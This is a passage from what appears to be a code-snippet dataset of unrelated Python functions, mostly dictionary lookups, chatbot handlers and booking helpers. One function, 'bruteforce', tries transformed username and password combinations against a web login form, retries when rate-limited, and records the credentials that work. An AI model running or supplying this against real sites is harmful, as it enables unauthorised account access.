'search'):\")\r\n data = input(\"Enter data (as required by the API):\")\r\n special = api+\":\"+command+\":\"+data\r\n new_state = State(searchNextId(), words={}, origin=CurrentInput, special=special)\r\n new_state.updateStateIncoming(CurrentState.id)\r\n new_state.updateStateResponse(response)\r\n new_state.updateStateWords(CurrentInput)\r\n writeState(new_state)\r\n print(\"I'm smarter now, try me again.\")", "def get_word_definition(word_model):\n word_id = word_model.key.string_id()\n req = urllib2.Request(app.wordlist_config.oxford_url_pattern % word_id)\n req.add_header('app_id', app.wordlist_config.oxford_app_id)\n req.add_header('app_key', app.wordlist_config.oxford_app_key)\n\n try:\n res = urllib2.urlopen(req)\n except urllib2.HTTPError as e:\n print('Oxford dictionary returned with error code %s' % e.code,\n file=sys.stderr)\n return False\n \n res_json = json.load(res)\n try:\n word_model.definition = \\\n res_json['results'][0]['lexicalEntries'][0]['entries'][0]['senses'][0]['definitions'][0]\n except (KeyError, TypeError):\n print('Invalid dictionary response', file=sys.stderr)\n print(json.dumps(res_json, indent=4), file=sys.stderr)\n return False\n \n try:\n pronunciations = res_json['results'][0]['lexicalEntries'][0]['pronunciations']\n audio_url = None\n for p in pronunciations:\n if 'audioFile' in p:\n audio_url = p['audioFile']\n break\n if audio_url is None:\n return True\n\n # download mp3 file\n audio_file = urllib2.urlopen(audio_url).read()\n # upload it to Google cloud\n gc_audio_file_name = 'audio/%s.mp3' % word_model.key.string_id()\n gc_audio_file_object = cloudstorage.open(\n '/' + app.wordlist_config.cloud_storage_bucket +\n '/' + gc_audio_file_name, 'w')\n gc_audio_file_object.write(audio_file)\n gc_audio_file_object.close()\n word_model.audio = gc_audio_file_name\n \n except (KeyError, TypeError, urllib2.URLError, cloudstorage.Error):\n word_model.audio = None\n\n return True", "def recieving_name_request(name):\n name = name.lower()\n\n global dictionary\n global no_lines\n global need_lines\n global bad_lines\n global gather_all_PU_lines_for_a_name\n global add_PUL_to_database\n\n if name in no_lines:\n return 'give general' #change\n else:\n if name in dictionary:\n return pick_PULs_from_database(dictionary[name])\n else:\n dictionary[name]={}\n names_PUL_from_internet = gather_all_PU_lines_for_a_name(name)\n if not names_PUL_from_internet:\n no_lines.append(name)\n need_lines.append(name)\n return 'give general'\n else:\n for PUL in names_PUL_from_internet:\n add_PUL_to_database(name, PUL, dictionary)\n if len(dictionary[name]) <=3:\n need_lines.append(name)\n return pick_PULs_from_database(dictionary[name])", "def autocomplete_possibilities():\n try:\n # get data sent by client\n typed_input = request.args.get('q')\n print(' ')\n print('\\n------ getting autocomplete_possibilities ------')\n print(f\"recived: input:{typed_input}\")\n\n # call the google API\n results = gmaps.places_autocomplete(typed_input)\n data = [\n {'value': r['place_id'], 'text': r['description']}\n for r in results\n ]\n\n # Pass data to the front end\n print(f'returning: {data}')\n return jsonify(data)\n\n except Exception as e:\n print(\"AJAX excepted \" + str(e))\n return str(e)", "def randomWords(self, input_word):\n input_word = json.dumps(input_word)\n return self.app.post('/words/1.0/random', data=input_word, follow_redirects=True,headers=self.headers)", "def urbandic(self, irc, msg, args, req):\n dict = {' ':'+'}\n req = self.replace_all(req, dict)\n if req:\n url = 
'http://www.urbandictionary.com/define.php?term=' + req\n else:\n url = 'http://www.urbandictionary.com/random.php'\n try:\n website = urllib2.urlopen(url)\n except urllib2.HTTPError, e:\n irc.reply('A problem occured. Please try again.')\n return\n soup = BeautifulSoup(website,\n convertEntities=BeautifulSoup.HTML_ENTITIES)\n td_word = soup.findAll(name='td',\n attrs={'class':'word'},\n limit=1)\n div_def = soup.findAll(name='div',\n attrs={'class':'definition'},\n limit=1)\n for t in td_word:\n if t.string:\n word = string.replace(t.string, '\\n', '')\n irc.reply('Word: ' + word, prefixNick=False)\n else:\n irc.reply('No word found.')\n return\n defn = ''\n for d in div_def:\n for c in d.contents:\n if c.string:\n defn += c.string\n irc.reply('Def.: ' + defn, prefixNick=False)", "def __check_word__(self, word):\n self.directionValue, self.isDirection = self.__isDirection__(word.lower())\n self.verbValue, self.isVerb = self.__isVerb__(word.lower())\n self.stopValue, self.isStop = self.__isStopWord__(word.lower())\n self.nounValue, self.isNoun = self.__isNoun__(word.lower())\n self.numberValue, self.isNumber = self.__isNumber__(word.lower())\n\n if self.isDirection:\n return self.directionValue\n elif self.isVerb:\n return self.verbValue\n elif self.isStop:\n return self.stopValue\n elif self.isNoun:\n return self.nounValue\n elif self.isNumber:\n return self.numberValue\n else:\n return ('error', word)", "def wiktionary(bot, trigger):\n word = trigger.group(2)\n if word is None:\n bot.reply('You must tell me what to look up!')\n return\n\n _etymology, definitions = wikt(word)\n if not definitions:\n # Cast word to lower to check in case of mismatched user input\n _etymology, definitions = wikt(word.lower())\n if not definitions:\n bot.reply(\"Couldn't get any definitions for %s.\" % word)\n return\n\n result = format(word, definitions)\n if len(result) < 300:\n result = format(word, definitions, 3)\n if len(result) < 300:\n result = format(word, definitions, 5)\n\n bot.say(result, truncation=' […]')", "def define(word: str):\n try:\n r = requests.get(\"http://www.urbandictionary.com/define.php?term={}\".format(word)) # goes to link for word\n soup = BeautifulSoup(r.content, features=\"html.parser\") # sets up soup\n def_header = \"**\" + soup.find(\"div\", attrs={\"class\": \"def-header\"}).text.replace(\"unknown\",\n \"\") + \"**\"\n # header is the word we are defining\n meaning = soup.find(\"div\", attrs={\"class\": \"meaning\"}).text # gets the definition\n for x in [1, 2, 3, 4, 5, 6, 7, 8, 9]:\n meaning = meaning.replace(str(x) + \". \", \"\\n\" + str(x) + \". \")\n meaning = \"```\" + meaning + \"```\"\n example = soup.find(\"div\", attrs={\"class\": \"example\"}).text # gets the example\n for x in [1, 2, 3, 4, 5, 6, 7, 8, 9]:\n example = example.replace(str(x) + \". \", \"\\n\" + str(x) + \". 
\")\n output = def_header + \": \" + meaning + \" \" + \"\\nExample: \" + \"```\" + example + \"```\" # output string\n output = output.replace(\"&apos\", \"'\") # replaces weird formatting of ' from original\n return output # returns the word, defintion, and example\n except AttributeError:\n return \"No results\"", "def get_secret_word():\n pass", "def addWord(self, word: 'str') -> 'None':\n p=self.dictword\n for s in word:\n if s not in p:\n p[s]={}\n p=p[s]\n else:\n p=p[s]\n p['#']=None", "def add_word(self, word, data=None):\n self.__word = word\n self.__data = data", "def learn_new_defn(word: str) -> None:\n\n # Retrieve the Word object from Charm's book\n word = acc.book[hash(word)]\n\n # Do not inherently ask to redefine\n if word.defn != '':\n return\n\n # Prompt for definition\n res = input(\"Define \\'\" + str(word) + \"\\'?\")\n\n if negative(res):\n # Do not define if response is negative\n return\n\n # Notify and define\n post_query(\"Defined \\'\" + str(word) + \"\\' as \\'\" + res + \"\\'\")\n word.define(res)", "def get_definition(request):\n result = \"No result\"\n if request.method == \"GET\":\n word = request.GET.get(\"get_word\", None)\n syns = wn.synsets(word)\n if len(syns) > 0:\n result = syns[0].definition()\n else:\n result = \"no result for word:\" + word\n return render(request, \"blog/re_definition.html\", {'result': result, 'word': word})", "def CreateWord(self, request, context):\n context.set_code(grpc.StatusCode.UNIMPLEMENTED)\n context.set_details('Method not implemented!')\n raise NotImplementedError('Method not implemented!')", "def validate(self, dispatcher, tracker, domain):\n requested_slot = tracker.get_slot(\"requested_slot\")\n if not requested_slot or requested_slot != \"suggestion\":\n return [SlotSet(\"requested_slot\", \"suggestion\")]\n return [SlotSet(\"suggestion\", tracker.latest_message['text'])]", "def create_request(self):\n try:\n stock_name, request = self.text.split(\" \")\n print(stock_name)\n print(request)\n if request in run_commands.keys():\n endpoint: str = run_commands.get(request).get('endpoint')\n url_maker: str = f\"stocks/{stock_name}{endpoint}\"\n print(url_maker)\n response: Optional[str, Dict[str, str]] = self.make_request(method=\"GET\", endpoint=url_maker)\n if isinstance(response, dict):\n print(response)\n api_response: Dict[str, str] = slack_response.stock_info(stock_name, response.get(\"message\"))\n print(api_response)\n return api_response\n else:\n return \"release in progress\"\n except ValueError as e:\n return slack_response.help_response()\n except KeyError as e:\n return slack_response.help_response()", "def process_input(self, word):\n return", "def add_word(self, request):\n if Word.query(Word.word == request.word).get():\n raise endpoints.ConflictException('That word is in the list!')\n else:\n word_list = []\n temp = request.word.upper()\n for i in temp:\n if i == \" \" or i < 'A' or i > 'Z':\n raise endpoints.BadRequestException(\n 'Please Enter One Word!')\n else:\n word_list.append(i)\n w = Word(word=request.word, word_list=word_list)\n w.put()\n return StringMessage(message='Added %s to the list!' 
% request.word)", "def filter(self, word):\n \n word = word.lower()\n try:\n self.engine.fetch(word)\n except socket.error:\n raise LemmaAPIError\n part_of_speeches = self.engine.part_of_speeches\n\n \n self.basic_form = word\n for part in part_of_speeches:\n if part == 'verb':\n if self.engine.is_verb_conjugated():\n if not self.conEngine.is_verb_regular(word, self.engine.get_basic_verb()):\n self.basic_form = self.engine.get_basic_verb()\n return word\n else:\n self.basic_form = self.engine.get_basic_verb()\n\n elif part == 'noun':\n if self.engine.is_noun_plural():\n if not self.conEngine.is_noun_regular(word, self.engine.get_singular_noun()):\n self.basic_form = self.engine.get_singular_noun() \n return word\n else:\n self.basic_form = self.engine.get_singular_noun()\n\n return self.basic_form", "def uber_types_handler(result,server_token):\n prodtypes_res = {}\n if result is not None and result!= {}:\n arguments = result.get(\"parameters\")\n\n # Establising Uber Session using UBER python SDK\n session = Session(server_token=server_token)\n uber_client = UberRidesClient(session)\n\n #Translating Street Address to Geo Coordinates\n soruce_address = arguments.get(\"source\")\n dest_address = arguments.get(\"destination\")\n geo = translate_to_geolocation(soruce_address)\n destGeo = translate_to_geolocation(dest_address)\n\n products = get_products(geo.get(\"lat\"),geo.get(\"lng\"),uber_client)\n prod_names = [prod.get(\"display_name\") for prod in products];\n\n speech = \"Which Uber type do you prefer? You can choose from \"\n text = \"Select a Uber type. Available options for your location are \"\n options = \", \".join(prod_names)\n print(options)\n\n context = get_context(result,USER_CONTEXT.NAME)\n context_parameters = context.get(\"parameters\")\n ##context_dic = json.loads(context)\n context_parameters[USER_CONTEXT.START_LAT]= geo.get(\"lat\")\n context_parameters[USER_CONTEXT.START_LNG]= geo.get(\"lng\")\n context_parameters[USER_CONTEXT.END_LAT] = destGeo.get(\"lat\")\n context_parameters[USER_CONTEXT.END_LNG] = destGeo.get(\"lng\")\n\n prodtypes_res = prepare_webhookresponse(text=text+options,speech= speech+options,context=context)\n\n return prodtypes_res", "async def query(cls, session: ClientSession,\n word: str) -> Union[None, 'UrbanDefinition']:\n async with session.get(UD_ENDPOINT.format(\n utils.urlescape(word))) as resp:\n json = await resp.json()\n\n # no results :(\n if json['result_type'] == 'no_results':\n return None\n\n result = json['list'][0]\n return cls(**result)", "def get_def_page(word):\n import urllib\n url = \"http://www.dictionary.com/cgi-bin/dict.pl?term=%s\" % word\n fo = urllib.urlopen(url)\n page = fo.read()\n return page", "def test_word_info(self):\n word = \"vitality\"\n rv = self.wordInfo(input_word=word)\n expected_output = {\n word: {\n \"frequency\": \"975\",\n \"defination\": \"{'Noun': ['an energetic style', 'a healthy capacity for vigorous activity', '(biology', 'not physical or chemical', 'the property of being able to survive and grow']}\",\n \"antonyms\": \"['enervation', 'inactivity', 'lethargy', 'weakness', 'lack']\",\n \"examples\": \"{1: 'And finally, both Lord Robertson and Secretary of State Powell pointed to what they called the vitality and the relevance of NATO, and said any damage done to the reputation of NATO over the last couple weeks can quite, in their words, be easily overcome.', 2: \\\"Professor Huxley himself has told us that he lived in 'the hope and the faith that in course of time we shall see our way from the 
constituents of the protoplasm to its properties,' _i. e._ from carbonic acid, water, and ammonia to that mysterious thing which we call vitality or life -- from the molecular motion of the brain to Socratic wisdom,\\\", 3: 'The strongest, the most amply endowed with what we call vitality or power to live, win.', 4: 'But the thought that it is mechanics and chemistry applied by something of which they as such, form no part, some agent or principle which we call vitality, is welcome to us.', 5: '\\\"The Indian savages,\\\" said Margrave, sullenly, \\\"have not a health as perfect as mine, and in what you call vitality -- the blissful consciousness of life -- they are as sticks and stones compared to me.\\\"'}\",\n \"pronounciation\": \"V AY0 T AE1 L AH0 T IY0\",\n \"synonyms\": \"['vigor', 'continuity', 'spunk', 'strength', 'verve']\"\n }\n }\n response_data = json.loads(rv.get_data(as_text=True))\n\n self.assertEquals(rv.status_code, 200)\n self.assertEquals(response_data[word][\"defination\"], expected_output[word][\"defination\"])\n self.assertEquals(response_data[word][\"antonyms\"], expected_output[word][\"antonyms\"])\n self.assertEquals(response_data[word][\"examples\"], expected_output[word][\"examples\"])\n self.assertEquals(response_data[word][\"frequency\"], expected_output[word][\"frequency\"])\n self.assertEquals(response_data[word][\"pronounciation\"], expected_output[word][\"pronounciation\"])\n self.assertEquals(response_data[word][\"synonyms\"], expected_output[word][\"synonyms\"])", "def get_box(req):", "def GetWordData(cls, request, response, func):\n word_list = request.get(\"word_list\", '')\n if not word_list:\n raise endpoints.BadRequestException(\"No word list was specified\")\n entity = WordList.get_by_id(word_list)\n if not entity:\n raise endpoints.NotFoundException(\"Word list {} was not found\".format(word_list))\n words = entity.words\n futures = {}\n foundWords = []\n notFoundWords = []\n for word in words:\n futures[word] = func(word)\n for word in futures:\n try:\n futures[word].get_result()\n foundWords.append(word)\n except Exception as e:\n notFoundWords.append(word)\n message = str(e)\n if len(message) < 100:\n response.write(\"<p>error when adding word {}: {}</p>\".format(word, message))\n else:\n response.write(\"<p>error when adding word {}: error too big to display\".format(word))\n response.write(\"<h1>Total Words Processed = {}</h1>\".format(len(words)))\n response.write(\"<h2>Successfully Added = {}</h2>\".format(len(foundWords)))\n response.write(\"<h2>Words with errors = {}</h2>\".format(len(notFoundWords)))", "def guess_word(self):\r\n guess = input(\"# Guess the Word :\")\r\n if not guess:\r\n print(\"Please enter a valid word.\")\r\n else:\r\n if game_instance.check_word(guess):\r\n print(\"Correct! You did it Champ!\")\r\n game_instance.calculate_score(self.frequency)\r\n self.instances.append(game_instance)\r\n obj.create_new_game()\r\n else:\r\n print(\"Wrong Guess. 
Try Again!\")", "def complete(index, prefix, text, field='form_suggest', size=100):\n response = { 'prefix': prefix, 'text':text, 'length': 0, 'complete': [] }\n \n key = \"word_completion\"\n body = {\n key: {\n \"text\": text,\n \"completion\": {\n \"field\": field,\n \"size\": size,\n \"context\": {\n \"prefix\": prefix\n }\n }\n }\n }\n res = index.suggest(body=body)\n #return res\n if key in res and res[key][0].get('length', 0) :\n complete = []\n \n options = res[key][0]['options']\n max_score = 0\n for opt in options:\n complete.append( {\n \"graph\": opt['payload']['graph'],\n \"lang\": opt['payload']['lang'],\n \"pos\": opt['payload']['pos'],\n \"form\": opt['payload']['form'],\n \"score\": opt['score'],\n \"output\": opt['text']\n })\n max_score = max(max_score, opt['score'])\n\n for v in complete:\n score = v['score']/max_score\n if text == v['form']:\n score +=1\n v['score'] = score\n\n complete.sort(key=lambda x : x['score'], reverse=True)\n \n response['length'] = len(complete)\n response['complete'] = complete\n response['size'] = size\n \n return response", "def random_words_func_post():\n data = request.get_json()\n\n password_length = data['passwordLength']\n mappings = data['mappings']\n case_mode = data['rwCase']\n\n max_word_length = db_session.query(Word.length, func.max(Word.length)).first()[0]\n min_word_length = db_session.query(Word.length, func.min(Word.length)).first()[0]\n\n used_words = __choose_random_words(max_word_length=max_word_length,\n min_word_length=min_word_length,\n password_length=password_length)\n\n password_words = apply_mappings(mappings, used_words)\n password_words = apply_case(password_words=password_words, case_mode=case_mode)\n\n password = ''.join(password_words)\n return jsonify({\n 'passwordWords': password_words,\n 'crackingTime': count_cracking_time(password),\n 'usedWords': used_words,\n 'isSafe': safepass(password)\n })", "def learn_new_word(word: str) -> None:\n\n if word is None:\n # Cannot learn known words\n return\n\n unlearned: bool = True\n\n while unlearned:\n # Ask about the word until it has been learned - its part of speech must be identified\n line = input(\"What is \" + word + \"?\")\n # Collect a dictionary of the valid Part names for comparison to input\n valid_names = names()\n\n # Split line by spaces to create a list of words\n line = line.split(' ')\n\n for arg in line:\n # Check all words in the input line for valid parts of speech\n if valid_names.__contains__(arg):\n acc.add_word(word, valid_names[arg])\n try_ask_save()\n return", "def visit_slot(self, slot_name: str, slot: SlotDefinition) -> None:\n sn = underscore(slot_name)\n self.emit('slot', sn)\n if slot.domain:\n self.emit('domain', sn, underscore(slot.domain))\n if slot.range:\n self.emit('range', sn, underscore(slot.range))\n for p in slot.mixins:\n self.emit('mixin', sn, underscore(p))\n if slot.is_a:\n is_a = underscore(slot.is_a)\n\n #uri = self.owlgen._prop_uri(slot.name)\n uri = f'http://w3id.org/biolink/vocab/{sn}'\n self.emit('has_uri', sn, uri)\n if slot.multivalued:\n self.emit('multivalued', sn)\n if slot.required:\n self.emit('required', sn)", "def handle_book_slot(time=None, name='default'):\n # Make request here\n print('in book slot')\n if not time:\n return question('You didn\\'t specify the time. 
Try again.')\n else:\n slot_date = session.attributes.get('date', None)\n params = {\n 'starttime': time,\n 'bookedbyuser': name,\n 'date': slot_date\n }\n print(params)\n session.attributes['stage'] = 'book_slot'\n session.attributes['slot_params'] = params\n return question('You want to book at ' + time + ' Is that correct?')", "def main():\n secret_word = get_word()\n print(secret_word)\n play_game(secret_word)", "async def ur(self, ctx: discord.ext.commands.Context, *args):\n print(\"-------------------------\")\n message_channel: discord.abc.Messageable = ctx.message.channel\n if len(args) == 1 or len(args) == 2:\n request_link = \"http://api.urbandictionary.com/v0/define?term=\" + str(args[0])\n async with aiohttp.ClientSession() as session:\n async with session.get(request_link) as resp: # the website use get\n request_result = await resp.json()\n if len(request_result[\"list\"]) == 0: # no results found\n print(\"No results for that word in urban dictionary\")\n await message_channel.send(\"*No results found for \\\"\" + str(\n args[0]) + \"\\\" in urban dictionary*\")\n else:\n # Store all definitions in an array\n definitions_found = []\n for definition in request_result[\"list\"]: # choose the best result with positive-percentage\n div = definition[\"thumbs_up\"] + definition[\"thumbs_down\"]\n if div == 0:\n percentage = 0\n else:\n percentage = (definition[\"thumbs_up\"] / div) * 100\n percentage = percentage * (definition[\"thumbs_up\"] + definition[\"thumbs_down\"])\n definitions_found.append(\n self.UrbanDefinition(definition['author'], definition['example'], definition['definition'],\n percentage)\n )\n # Sort the definition using votes\n definitions_found.sort(key=lambda UrbanDefinition: UrbanDefinition.votes, reverse=True)\n # create the embed to send\n if len(args) == 2 and args[1].isdigit():\n number_of_results = int(args[1])\n else:\n number_of_results = 1\n embed = discord.Embed(title=\"Urban Dictionary - Link\",\n url=\"https://www.urbandictionary.com/define.php?term=\" +\n urllib.parse.quote(str(args[0])),\n color=0x1d2439,\n description=\"Best \" + str(\n number_of_results) + \" urban dictionary results for \\\"\" + str(args[0]) + \"\\\"\")\n embed.set_author(name=\"Search required by \" + ctx.message.author.name,\n icon_url=ctx.message.author.avatar_url)\n embed.set_thumbnail(\n url='https://cdn.discordapp.com/attachments/276674976210485248/350641481872179200/featured-image4.jpg')\n # Calculate number of results to display and start creating the embed fields\n for x in range(0, min(len(definitions_found), number_of_results)):\n # Check text and prepare embed\n definition_text = definitions_found[x].definition\n if len(definition_text) > 1024: # cut the string, is too long\n definition_text = definition_text[:1000] + \"[TEXT TOO LONG]...\"\n embed.add_field(name=(\"Definition (From \" + str(definitions_found[x].author) + \"):\"),\n value=definition_text, inline=False)\n example_text = definitions_found[x].example\n if len(example_text) > 1024: # cut the string, is too long\n example_text = example_text[:1000] + \"[TEXT TOO LONG]...\"\n elif len(example_text) < 5:\n example_text = \"Example not available...\"\n embed.add_field(name=\"Example(s):\", value=example_text, inline=False)\n embed.add_field(name=\"---------------------------------------------\",\n value=\"---------------------------------------------\", inline=False)\n # End for, add footer and send the embed\n embed.set_footer(text=\"Using http://www.urbandictionary.com/\")\n try:\n await 
message_channel.send(embed=embed)\n print(\"Ur embed sent successfully\")\n except discord.errors.HTTPException:\n print(\"HTTPException during the sending of ur embed\")\n await message_channel.send(\"*An error occurred sending the result...*\")\n else:\n await message_channel.send(\n \"**Usage:** \" + self.command_prefix + \"ur word, for more see \" + self.command_prefix + \"help ur\")\n print(\"-------------------------\")", "def parse(self, text):\n\n goal = NLUGoal()\n goal.text = str(text)\n self._nlu_client.send_goal_and_wait(goal)\n result = self._nlu_client.get_result()\n\n #no intent found, return None \n if result.intentName == \"\":\n return None, None, None\n else:\n #parse\n slot_info = json.loads(result.slot_json_string)\n return result.intentName, result.probability, slot_info", "def replace_word(self):\n wordlist_path = self.get_wordlist_path()\n with open(wordlist_path) as f:\n data = json.load(f)\n\n for index, exist_word in data[\"words\"].items():\n if self.word == exist_word:\n new_word = input(\"New word:\\n\")\n if not check_word_format(new_word):\n exit()\n if exists_already(data,new_word):\n exit()\n # write new_word in\n data[\"words\"][index] = new_word\n data[\"words\"] = dict(sorted(data[\"words\"].items(), key=lambda item: item[1]))\n\n with open(wordlist_path, 'w') as f:\n json.dump(data, f, indent = 4)\n print(f\"[{self.word}] has been replaced by [{new_word}]!\")\n return\n\n print(f\"[{self.word}] does not exist in list!\")", "def is_valid_word(word, hand, word_list):\n failure=True\n word=word.lower()\n if word not in word_list:\n failure=False\n for i in word:\n w=hand.get(i,0)\n if w==0:\n failure=False\n break\n return failure", "def handle_find_slot(date=None):\n if not date:\n session.attributes['stage'] = 'book_slot'\n return question('You didn\\'t specify the date. 
What date you would like to book?')\n else:\n print(date)\n params = {\n 'date': date\n }\n req = requests.get(config.API + '/find_slot', params=params)\n print(req.text)\n freeslots_string = get_time_strings(json.loads(req.text)['freesloats'])\n session.attributes['stage'] = 'find_slot'\n session.attributes['date'] = date\n return question(\n 'The free slots for ' + date + ' are ' + freeslots_string + ' Which one do you want me to book?')", "def validate(self, context):\n _logger.info(\"SpellDictionary EN validated\")\n self.dictionary = {\"hello\" , \"world\", \"welcome\", \"to\", \"the\", \"ipopo\", \"tutorial\"}", "def createWord(self, address: ghidra.program.model.address.Address) -> ghidra.program.model.listing.Data:\n ...", "def decide_action(self):\t\t\t\t\t#defining the function to decide the action\n recognizer, audio = self.speech.listen_for_audio()\t\t#listening for the audio\n\n # received audio data, now we'll recognize it using Google Speech Recognition\n speech = self.speech.google_speech_recognition(recognizer, audio)\t#storing the speech into variable as a text\n\n if speech is not None:\t\t#if speech is not recognized\n try:\n req = requests.get('https://api.wit.ai/message?v=20160918&q=%s' % speech,\n headers={\"Authorization\": wit_ai_token})\t\t#getting the wit.ait token and checking it\n print req.text\t\t\t#printing the text\n json_responce = json.loads(req.text)\t\t#printing the responce\n entities = None\t\t\t#inititaling the entities\n intent = None\t\t\t#initialising the intent\n if 'entities' in json_responce and 'Intent' in json_responce['entities']:\t#checking the the intents and entitites\n entities = json_responce['entities']\t\t#entities \n intent = json_responce['entities']['Intent'][0][\"value\"]\t#intents \n\n print intent\t#printing the intents\n if intent == 'greeting':\t#checking the intent type\n self.__text_action(self.nlg.greet()) #getting the function of the intent\n elif intent == 'snow white':\t\t#checking the intent type\n self.__text_action(self.nlg.snow_white())\t\t#getting the function of the intent\n elif intent == 'weather':\t\t#checking the intent type\n self.__weather_action(entities)\t#getting the function of the intent\n elif intent == 'news':\t\t\t#checking the intent type\n self.__news_action()\t#getting the function of the intent\n elif intent == 'maps':\t\t\t#getting the function of the intent\n self.__maps_action(entities)\t\t#getting the function of the intent#checking the intent type\n elif intent == 'holidays':\t\t#getting the function of the intent#checking the intent type\n self.__holidays_action()\t\t\t#getting the function of the intent#checking the intent type\n elif intent == 'appearance':\t\t#getting the function of the intent#checking the intent type\n self.__appearance_action()\t\t#getting the function of the intent#checking the intent type\n elif intent == 'user status':\t\t#getting the function of the intent#checking the intent type\n self.__user_status_action(entities)\t\t#getting the function of the intent#checking the intent type\n elif intent == 'user name':\t\t\t#getting the function of the intent#checking the intent type\n self.__user_name_action()\t\t\t#getting the function of the intent#checking the intent type\n elif intent == 'personal status':\t\t#getting the function of the intent#checking the intent type\n self.__personal_status_action()\t\t#getting the function of the intent#checking the intent type\n elif intent == 'joke':\t\t\t#getting the function of the intent#checking the intent type\n 
self.__joke_action()\t\t#getting the function of the intent#checking the intent type\n elif intent == 'insult':\t\t#getting the function of the intent#checking the intent type\n self.__insult_action()\t#getting the function of the intent#checking the intent type\n return\t\t\t\t#retuning\n elif intent == 'appreciation':\t\t\t#getting the function of the intent#checking the intent type\n self.__appreciation_action()\t\t\t#getting the function of the intent#checking the intent type\n return\n elif intent == 'music':\t\t\t#getting the function of the intent#checking the intent type\n self.__music_action(music_file)\t\t#getting the function of the intent#checking the intent type\n elif intent == 'navigation':\t\t\t#getting the function of the intent#checking the intent type\n self.__navigate_action()\n elif intent == 'tasks':\n self.__calender_events()\n\t\telif intent == 'guide':\n self.__guide()\n elif intent == 'web':\n self.__web()\n elif intent == 'video':\n self.__video()\n else: # No recognized intent\n self.__text_action(\"I'm sorry, I don't know about this yet.\")\n return\n\n except Exception as e:\n print \"Failed wit !\"\t\t\t#error message\n print(e)\t\t\t#printing the error\n traceback.print_exc()\n self.__text_action(\"I'm sorry, I couldn't understand what you mean !!\") #printing message\n return\t\t\t\t\n\n self.decide_action()", "async def urban(self, interaction: Interaction, args: str):\n baseurl = \"https://www.urbandictionary.com/define.php?term=\"\n output = args\n await interaction.response.send_message(baseurl + output)", "def parse(self, word):\n raise NotImplementedError", "def run(request):\n print(\"This is the run() method\")\n \n #load str\n payload = json.loads(request)\n \n return f\"/n Returning the input for testing: {payload}\"", "def createQWord(self, address: ghidra.program.model.address.Address) -> ghidra.program.model.listing.Data:\n ...", "def check_word(self, word):\n word = word.lower().strip()\n return not word or word in self.dictionary", "def word_finder(request):\n correction = \" \"\n error = \" \"\n alist = [\"NONE\"]\n if request.method == \"GET\":\n spell_checker(request)\n\n return render(request, \"blog/word_finder.html\", {'correction' : correction, 'error': error, 'args': alist})", "def _add_user(self):\n args = {}\n args[\"name\"] = False\n #Loop until valid name given\n while not args[\"name\"]: #While name not set\n args[\"name\"] = input(\"Please enter the username of the user you would like to add: \").lower()\n args[\"userID\"] = self._get_user_id(args[\"name\"])\n if not args[\"userID\"]:\n args[\"name\"] = False\n #Get more input\n args[\"webhook_url\"] = input(\"Please enter the Discord WebHook URL for this user: \")\n args[\"override\"] = None\n #Loop until override info completed\n while args[\"override\"] == None:\n userInput = input(\"Override authentication user? 
y/n: \")\n if userInput.lower() == \"y\":\n args[\"override\"] = True\n args[\"overrideUser\"] = False\n #Loop until valid user given\n while not args[\"overrideUser\"]:\n args[\"overrideUser\"] = input(\"Please enter the Twitch username that you would like to authenticate with: \").lower()\n args[\"overrideUserID\"] = self._get_user_id(args[\"overrideUser\"])\n if not args[\"overrideUserID\"]:\n args[\"overrideUser\"] = False\n #Get oauth input, removing 'oauth:' from beginning\n args[\"overrideOauth\"] = input(\"Please enter the oauth token for the Twitch account, omitting 'oauth:': \")\n if args[\"overrideOauth\"].startswith(\"oauth:\"): #If the oauth token starts with oauth:, remove it\n args[\"overrideOauth\"] = args[\"overrideOauth\"][6:]\n elif userInput.lower() == \"n\":\n args[\"override\"] = False\n else:\n print(\"That is not a valid input.\")\n args[\"blacklist\"] = input(\"Please enter a space separated list of users to blacklist: \")\n return(args)", "def bruteforce(request, url, host, port, agent, \n user_key, pass_key, action_val, words):\n # successful credentials\n success = []\n success_users = set()\n\n # Add all transformations for each word\n all_words = set(words)\n transformations = transform.generate_transformations(list(words))\n for word in words:\n transformation = transformations[word]\n all_words.add(transformation.lower)\n all_words.add(transformation.upper)\n all_words.add(transformation.reverse)\n all_words.add(transformation.leet)\n \n # Try all combinations for the form described by url on host\n content_type = HTTP_CONTENTTYPE_FORMENCODED\n sleep_time = HTTP_RETRY_TIME\n for user in all_words:\n for _pass in all_words:\n data = {user_key: user, pass_key: _pass, 'action': action_val}\n body = HttpRequest.generate_post_body(content_type,data)\n content_length = len(body)\n too_many_req = 0\n while too_many_req < HTTP_TOO_MANY_REQ:\n response = request.send_post_request(url, host, \n agent, content_type,\n content_length, body)\n if response is None:\n too_many_req += 1\n print(f\" unable to contact {host}{url}. retrying in {HTTP_RETRY_TIME} seconds.\")\n time.sleep(HTTP_RETRY_TIME)\n continue\n # print(f'User: {user}, Pass: {_pass}')\n \n # See if the response contained any words that indicate a successful login.\n if verify_success_resp(tokenize_html(response.response,True)):\n # print(f' SUCCESS.')\n if user.lower() not in success_users:\n success.append(Credential(user.lower(),_pass))\n success_users.add(user.lower())\n break\n \n # Check the status code.\n status_tuple = response.status_code\n if status_tuple is not None:\n status_code, __ = status_tuple\n # print(f' FAIL. {status_code}')\n if status_code == \"429\" or status_code == \"503\":\n time.sleep(sleep_time)\n print(f\" {host}{url} was busy. 
retrying in {HTTP_RETRY_TIME} seconds.\")\n too_many_req += 1\n else:\n break\n if too_many_req >= HTTP_TOO_MANY_REQ:\n return success\n return success", "def define(word):\n\treturn lexicon.get(word.upper(), \"I couldn't find the definition of {}\\n\".format(word))", "def hello_word():\n return {\"hello\": \"world\"}", "def test_input_text_returned_in_response_data(self):\n user_name = \"Ron Obvious\"\n user_input = \"Hello!\"\n\n data = self.chatbot.get_response_data(user_name, user_input)\n\n self.assertIn(user_input, data[\"user\"].keys())", "def guess_word(self, request):\n return games_ctrl.guess_word(request.urlsafe_game_key,\n request.word_guess)", "def main_completer_handler(self, text, state):\r\n response = None\r\n all_equals = []\r\n value = False\r\n equals = []\r\n\r\n # Build match list on first iteration else continue\r\n if state == 0:\r\n origline = readline.get_line_buffer()\r\n begin = readline.get_begidx()\r\n end = readline.get_endidx()\r\n being_completed = origline[begin:end]\r\n words = origline.split()\r\n\r\n if not words:\r\n # option for words list\r\n self.current_candidates = sorted(self.options.keys())\r\n else:\r\n # traverse all words entries and passing accordingly\r\n try:\r\n if begin == 0:\r\n # first word\r\n candidates = list(self.options.keys())\r\n else:\r\n # later word\r\n if '=' in words[len(words)-1] and len(words) > 1:\r\n #use possible values as candidates\r\n value = True\r\n equals = words[len(words)-1].split('=')\r\n if equals[1]:\r\n all_equals = [i.split('=') for i in words if '=' in i]\r\n\r\n if 